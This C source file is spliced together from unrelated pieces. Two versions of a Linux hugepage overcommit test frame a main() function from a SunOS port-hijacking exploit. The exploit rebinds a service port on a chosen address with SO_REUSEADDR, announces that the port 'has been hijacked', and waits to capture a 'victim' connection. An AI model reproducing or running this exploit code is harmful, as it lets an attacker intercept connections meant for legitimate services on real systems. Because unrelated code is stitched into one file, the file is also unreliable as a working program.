static void test_overcommit(void)
{
void *addr = NULL, *shmaddr = NULL;
if (opt_shmid) {
shmid = SAFE_SHMGET(key, (length / 2 * hugepagesize),
SHM_HUGETLB | IPC_CREAT | SHM_R | SHM_W);
} else {
fd = SAFE_OPEN(TEST_FILE, O_CREAT | O_RDWR, 0755);
addr = SAFE_MMAP(ADDR, (length / 2 * hugepagesize),
PROTECTION, FLAGS, fd, 0);
}
if (opt_sysfs) {
tst_res(TINFO, "check sysfs before allocation.");
if (checksys(path_sys_sz_huge, "HugePages_Total", length / 2))
return;
if (checksys(path_sys_sz_free, "HugePages_Free", length / 2))
return;
if (checksys(path_sys_sz_surp, "HugePages_Surp",
length / 2 - size))
return;
if (checksys(path_sys_sz_resv, "HugePages_Rsvd", length / 2))
return;
} else {
tst_res(TINFO, "check /proc/meminfo before allocation.");
if (checkproc(SAFE_READ_MEMINFO("HugePages_Total:"),
"HugePages_Total", length / 2))
return;
if (checkproc(SAFE_READ_MEMINFO("HugePages_Free:"),
"HugePages_Free", length / 2))
return;
if (checkproc(SAFE_READ_MEMINFO("HugePages_Surp:"),
"HugePages_Surp", length / 2 - size))
return;
if (checkproc(SAFE_READ_MEMINFO("HugePages_Rsvd:"),
"HugePages_Rsvd", length / 2))
return;
}
if (opt_shmid) {
tst_res(TINFO, "shmid: 0x%x", shmid);
shmaddr = SAFE_SHMAT(shmid, ADDR, SHMAT_FLAGS);
check_wr_bytes(shmaddr);
} else {
check_wr_bytes(addr);
}
if (opt_sysfs) {
tst_res(TINFO, "check sysfs.");
if (checksys(path_sys_sz_huge, "HugePages_Total", length / 2))
return;
if (checksys(path_sys_sz_free, "HugePages_Free", 0))
return;
if (checksys(path_sys_sz_surp, "HugePages_Surp",
length / 2 - size))
return;
if (checksys(path_sys_sz_resv, "HugePages_Rsvd", 0))
return;
} else {
tst_res(TINFO, "check /proc/meminfo.");
if (checkproc(SAFE_READ_MEMINFO("HugePages_Total:"),
"HugePages_Total", length / 2))
return;
if (checkproc(SAFE_READ_MEMINFO("HugePages_Free:"),
"HugePages_Free", 0))
return;
if (checkproc(SAFE_READ_MEMINFO("HugePages_Surp:"),
"HugePages_Surp", length / 2 - size))
return;
if (checkproc(SAFE_READ_MEMINFO("HugePages_Rsvd:"),
"HugePages_Rsvd", 0))
return;
}
if (opt_shmid) {
SAFE_SHMDT(shmaddr);
SAFE_SHMCTL(shmid, IPC_RMID, NULL);
} else {
SAFE_MUNMAP(addr, (length / 2 * hugepagesize));
SAFE_CLOSE(fd);
SAFE_UNLINK(TEST_FILE);
}
tst_res(TPASS, "hugepages overcommit test pass");
}
int
main(int argc, char **argv)
{
int inbuf, jacksock, opts, solvuln;
int port = PORT;
char *vulnerable = NULL;
char *systype = NULL;
char *isvuln = NULL;
char *bad = NULL;
struct sockaddr_in solaris, victims;
if(argc < 2) {
banner();
_exit(EXIT_FAILURE);
}
if((systype = checksys(isvuln)) == NULL) {
puts("Something messed up!");
checkerr(isvuln);
}
if(strcmp(SYSTEM, systype) != 0) {
puts("System is not supported - SunOS only!");
checkerr(isvuln);
}
fprintf(stderr, "\n%s-> %sOK, potential vulnerable %s[%s] %ssystem, continuing..\n", WH, NO, BL, systype, NO);
free(isvuln); sleep(2);
while((opts = getopt(argc, argv, "h:p:v")) != -1) {
switch(opts)
{
case 'h':
bad = BAD;
vulnerable = malloc(16);
if(!vulnerable) {
perror("malloc");
_exit(EXIT_FAILURE);
}
if((optarg == NULL) || (strlen(optarg) < 7) || (strlen(optarg) > 15) || strpbrk(bad, optarg)) {
puts("\n[-] Failed: IP address just isn't right!\n");
jackerr(vulnerable);
}
memcpy(vulnerable, optarg, strlen(optarg));
if(!vulnerable) {
jackerr(vulnerable);
}
break;
case 'p':
port = atoi(optarg);
if((port < 1024) || (port > 65535)) {
puts("\n[-] Failed: Port number just isn't right!\n");
usage(argc, argv);
_exit(EXIT_FAILURE);
}
break;
case 'v':
usage(argc, argv);
break;
default:
usage(argc, argv);
break;
}
}
if(vulnerable == NULL) {
jackerr(vulnerable);
}
fprintf(stderr, "%s-> %sJacking port %s[%d] %sat address %s[%s]%s\n", WH, NO, PI, port, NO, PU, vulnerable, NO);
jacksock = socket(AF_INET, SOCK_STREAM, 0);
if(jacksock < 0) {
perror("socket");
jackerr(vulnerable);
} sleep(2);
if(setsockopt(jacksock, SOL_SOCKET, SO_REUSEADDR, &solvuln, sizeof(int)) < 0) {
perror("setsockopt");
}
solaris.sin_family = AF_INET;
solaris.sin_port = htons(port);
solaris.sin_addr.s_addr = inet_addr(vulnerable);
memset(&solaris.sin_zero, '\0', sizeof(solaris.sin_zero));
if(bind(jacksock, (struct sockaddr *)&solaris, sizeof(struct sockaddr)) < 0) {
perror("bind");
fprintf(stderr, "[-] %sFailed: %sCould not snag port, must be patched!\n", RE, NO);
jackerr(vulnerable);
}
fprintf(stderr, "%s-> %s%sSuccess!! %sPort %s[%d] %shas been hijacked!\n%s-> %sWait...\n", WH, NO, YE, NO, PI, port, NO, WH, NO);
if(listen(jacksock, MAX_INCONN) < 0) {
perror("listen");
puts("[-] Failed: Could not listen for an incoming connection!");
jackerr(vulnerable);
} sleep(2);
fprintf(stderr, "%s-> %sOK, listening for incoming connections to compromise", WH, NO);
inbuf = sizeof(victims);
if(accept(jacksock, (struct sockaddr *)&victims, &inbuf) < 0) {
perror("accept");
puts("[-] Failed: Could not accept the incoming connection!");
jackerr(vulnerable);
}
fprintf(stderr, "\n%s-> %sSnagged a victim connecting from %s[%s]%s\n", WH, NO, YE, inet_ntoa(victims.sin_addr), NO);
sleep(1);
close(jacksock);
puts("-> Victim has been released to live another day!");
sleep(1);
puts("-> Test was a success!");
free(vulnerable);
return(0);
}
static void overcommit(void)
{
void *addr = NULL, *shmaddr = NULL;
int fd = -1, key = -1;
char s[BUFSIZ];
FILE *fp;
if (shmid != -1) {
/* Use /proc/meminfo to generate an IPC key. */
key = ftok(PATH_MEMINFO, strlen(PATH_MEMINFO));
if (key == -1)
tst_brkm(TBROK|TERRNO, cleanup, "ftok");
shmid = shmget(key, (long)(length / 2 * hugepagesize),
SHM_HUGETLB | IPC_CREAT | SHM_R | SHM_W);
if (shmid == -1)
tst_brkm(TBROK|TERRNO, cleanup, "shmget");
} else {
/* XXX (garrcoop): memory leak. */
snprintf(s, BUFSIZ, "%s/hugemmap05/file", get_tst_tmpdir());
fd = open(s, O_CREAT | O_RDWR, 0755);
if (fd == -1)
tst_brkm(TBROK|TERRNO, cleanup, "open");
addr = mmap(ADDR, (long)(length / 2 * hugepagesize), PROTECTION,
FLAGS, fd, 0);
if (addr == MAP_FAILED)
tst_brkm(TBROK|TERRNO, cleanup, "mmap");
}
if (opt_sysfs) {
tst_resm(TINFO, "check sysfs before allocation.");
if (checksys(path_sys_sz_huge, "HugePages_Total",
length / 2) != 0)
return;
if (checksys(path_sys_sz_free, "HugePages_Free",
length / 2) != 0)
return;
if (checksys(path_sys_sz_surp, "HugePages_Surp",
length / 2 - size) != 0)
return;
if (checksys(path_sys_sz_resv, "HugePages_Rsvd",
length / 2) != 0)
return;
} else {
tst_resm(TINFO,
"check /proc/meminfo before allocation.");
fp = fopen(PATH_MEMINFO, "r");
if (fp == NULL)
tst_brkm(TBROK|TERRNO, cleanup, "fopen");
if (checkproc(fp, "HugePages_Total", length / 2) != 0)
return;
if (checkproc(fp, "HugePages_Free", length / 2 ) != 0)
return;
if (checkproc(fp, "HugePages_Surp", length / 2 - size) != 0)
return;
if (checkproc(fp, "HugePages_Rsvd", length / 2) != 0)
return;
fclose(fp);
}
if (shmid != -1) {
tst_resm(TINFO, "shmid: 0x%x", shmid);
shmaddr = shmat(shmid, ADDR, SHMAT_FLAGS);
if (shmaddr == (void *)-1)
tst_brkm(TBROK|TERRNO, cleanup, "shmat");
write_bytes(shmaddr);
read_bytes(shmaddr);
} else {
write_bytes(addr);
read_bytes(addr);
}
if (opt_sysfs) {
tst_resm(TINFO, "check sysfs.");
if (checksys(path_sys_sz_huge, "HugePages_Total",
length / 2) != 0)
return;
if (checksys(path_sys_sz_free, "HugePages_Free", 0)
!= 0)
return;
if (checksys(path_sys_sz_surp, "HugePages_Surp",
length / 2 - size) != 0)
return;
if (checksys(path_sys_sz_resv, "HugePages_Rsvd", 0)
!= 0)
return;
} else {
tst_resm(TINFO, "check /proc/meminfo.");
fp = fopen(PATH_MEMINFO, "r");
if (fp == NULL)
tst_brkm(TBROK|TERRNO, cleanup, "fopen");
if (checkproc(fp, "HugePages_Total", length / 2) != 0)
return;
if (checkproc(fp, "HugePages_Free", 0) != 0)
return;
if (checkproc(fp, "HugePages_Surp", length / 2 - size) != 0)
return;
if (checkproc(fp, "HugePages_Rsvd", 0) != 0)
return;
fclose(fp);
}
if (shmid != -1) {
if (shmdt(shmaddr) != 0)
tst_brkm(TBROK|TERRNO, cleanup, "shmdt");
} else {
munmap(addr, (long)(length / 2 * hugepagesize));
close(fd);
unlink(s);
}
}
